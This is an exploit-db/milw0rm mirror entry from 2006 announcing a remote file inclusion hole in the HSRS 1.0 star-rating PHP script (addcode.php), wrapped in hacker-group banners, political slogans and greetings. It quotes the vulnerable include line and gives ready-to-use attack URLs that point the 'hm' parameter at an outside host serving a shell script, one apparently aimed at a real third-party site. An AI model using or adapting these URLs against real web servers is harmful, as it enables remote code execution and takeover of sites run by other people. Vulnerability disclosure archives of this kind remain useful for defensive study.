exploit-db-mirror/platforms/php/webapps/2838.txt

--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------


HSRS <= 1.0 (HIOX Star Rating System Script) (addcode.php)  Remote File
Include Vulnerability



Found By  :  CoLd Zero  [ Wasem898 ]

Source    :  include_once ($4AZHAR_TeAM."Securty.");

            require ($SpECiALPowEr.oRg_TeAm."Securty");

            A_mal Hackeing Team _ Hacking



PalesTine Arab Muslim Hacker

http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif

######################################################
#
#            HSRS 1.0 (HIOX Star Rating System Script)
#
# Class:     Remote File Include Vulnerability
# Published  2006-11-23
# Remote:    Yes
# Type:      High
# Site:      http://www.hscripts.com/scripts/php/downloads/HSRS.zip
#
# Author:    Cold Zero
# Contact:   c.o.1.d.0@hotmail.com
#
######################################################

About :
FREE Five Star Rating System Script that can be added in any web page with
php support.
A database based script developed using php and javascript.
This give your users a chance to rate on your articles, tutorials, photos,
images or whatever you want on a scale of 1-5 stars.

==========================

file ;

addcode.php

==========================

 include "$hm/auth/config.php";

======================================================
Example:

http://www.jusmail.com/5000/HSRS/addcode.php?hm=http://www.violatorthrash.com/flyers/cold.txt?cmd

======================================================
Exploit :

Http://www.Victem.0/[PaTH]/addcode.php?hm=http://coldzero.shell?cmd


======================================================

----  GreeTz: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
              [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[


****************************************************************
# *www.4azhar.com Securty Team    >>      www.4azhar.com        *
# *SpeciaL PoweR SecuritY Team    >>      www.specialpower.org  *
# *A_mal Hacking Team             >>      -vv -l -p The-Pradise *
*****************************************************************


http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif


--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------

# milw0rm.com [2006-11-23]